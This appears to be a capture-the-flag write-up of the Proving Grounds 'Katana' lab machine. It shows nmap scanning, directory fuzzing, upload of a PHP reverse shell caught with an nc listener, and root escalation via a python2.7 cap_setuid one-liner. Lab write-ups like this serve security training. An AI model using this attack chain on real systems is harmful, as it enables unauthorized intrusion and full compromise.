Security Analyst | Security Researcher | CRTP

Proving grounds Play: Katana

Proving grounds Play - Katana CTF writeup.

Nmap

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 894f3a5401f8dcb66ee078fc60a6de35 (RSA)
|   256 ddaccc4e43816be32df312a13e4ba322 (ECDSA)
|_  256 cce625c0c6119f88f6c4261edefae98b (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Katana X
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.38 (Debian)
8088/tcp open  http    LiteSpeed httpd
|_http-title: Katana X
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: LiteSpeed
8715/tcp open  http    nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-title: 401 Authorization Required
|_http-server-header: nginx/1.14.2
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

21/tcp - open ftp - vsftpd 3.0.3

Anonymous login prohibited.

80/tcp - open http - Apache httpd 2.4.38 ((Debian))

Nothing, but just an image.

img

8088/tcp - open http - LiteSpeed httpd

Directory Fuzzing

Directory fuzzing found multiple files.

http://192.168.197.83:8088/phpinfo.php
http://192.168.197.83:8088/upload.php
http://192.168.197.83:8088/upload.html

upload.html

File upload

img

Please wait for 1 minute!. Please relax!.
File : file1
Name : rshell.php
Type : application/x-php
Path : /tmp/phpSvDMjM
Size : 2589
Please wait for 1 minute!. Please relax!. Moved to other web server: /tmp/phpSvDMjM ====> /opt/manager/html/katana_rshell.php
MD5  : 8bdfb93257f57669e9aa5b48caffe853
Size : 2589 bytes
File : file2
Name : rshell.php
Type : application/x-php
Path : /tmp/phpaXZwe8
Size : 2589
Please wait for 1 minute!. Please relax!. Moved to other web server: /tmp/phpaXZwe8 ====> /opt/manager/html/katana_rshell.php

Upload the reverse shell and note down the file name. Fuzz for the file on all 3 URLs.

Trigger http://192.168.197.83:8715/katana_rshell.php

naveenj@hackerspace:|21:35|~/pg-play/Katana/files$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.45.237] from (UNKNOWN) [192.168.197.83] 58806
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 21:37:41 up 18 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (407): Inappropriate ioctl for device
bash: no job control in this shell
www-data@katana:/$ 

Initial Foothold Obtained

Privilege Escalation

Get the extended capabilities of the linux machine using the below command.

getcap -r / 2>/dev/null

Capabilities

www-data@katana:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep

The binary /usr/bin/python2.7 has extended capabilities which is vulnerable to privilege escalation. More.

www-data@katana:~$ getcap -r / 2>/dev/null  #Get capabilities
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
www-data@katana:~$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");' #Exploit
< 'import os; os.setuid(0); os.system("/bin/bash");'
id
uid=0(root) gid=33(www-data) groups=33(www-data) #Root Obtained
whoami
root

Root Obtained

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.